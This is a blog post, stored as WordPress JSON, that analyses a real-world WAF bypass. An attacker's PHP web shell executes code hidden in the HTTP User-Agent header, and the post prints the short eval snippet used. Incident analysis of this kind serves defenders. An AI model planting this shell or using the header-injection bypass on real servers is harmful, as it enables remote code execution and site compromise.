{"id":8,"date":"2023-11-25T22:05:55","date_gmt":"2023-11-25T22:05:55","guid":{"rendered":"https:\/\/ticklemeelmo.com\/malware\/?p=8"},"modified":"2023-11-26T05:13:07","modified_gmt":"2023-11-26T05:13:07","slug":"waf-evasion-using-http-user-agent-string","status":"publish","type":"post","link":"https:\/\/syschan.org\/malware\/waf-evasion-using-http-user-agent-string\/","title":{"rendered":"WAF Evasion Using HTTP User Agent String"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Web application firewalls are often a first line of defense for protecting web sites from malicious actors. Unfortunately, they are not a silver bullet, and in many cases won\u2019t prevent a site from being compromised if the site contains underlying vulnerabilities.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In the case I will describe in this post, an attacker was able to leverage a file upload vulnerability to place a PHP web shell on a victim server. However, a WAF in place was preventing the attacker from executing code through their web shell using POST or GET parameters.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To work around this, another PHP shell was dropped, designed to execute code placed in the User Agent string of the requests made to the shell.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The malicious code:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"php\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">if (eregi(\"final\",$_SERVER['HTTP_USER_AGENT'])) { \neval(str_replace('Mozilla\/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">In this case, the deployed WAF was only designed to spot potentially malicious activity in locations where user-supplied data was expected, like the values of POST and GET parameters and 
COOKIE variables.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It\u2019s important to remember, however, that an attacker controls every part of the requests they make to the server \u2013 including the contents of the User Agent string.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Final Thoughts:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">While this is not a common WAF bypass methodology in my experience, it\u2019s certainly interesting and worth being aware of.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Web application firewalls are often a first line of defense for protecting web sites from malicious actors. Unfortunately, they are not a silver bullet, and in many cases won\u2019t prevent a site from being compromised if the site contains underlying vulnerabilities. In the case I will describe in this post, an attacker was able to [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-8","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/8","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/comments?post=8"}],"version-history":[{"count":8,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/8\/revisions"}],"predecessor-version":[{"id":114,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/8\/revisions\/114"}],"wp:attachment":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/media?parent=8"}],"wp:term":
[{"taxonomy":"category","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/categories?post=8"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/tags?post=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}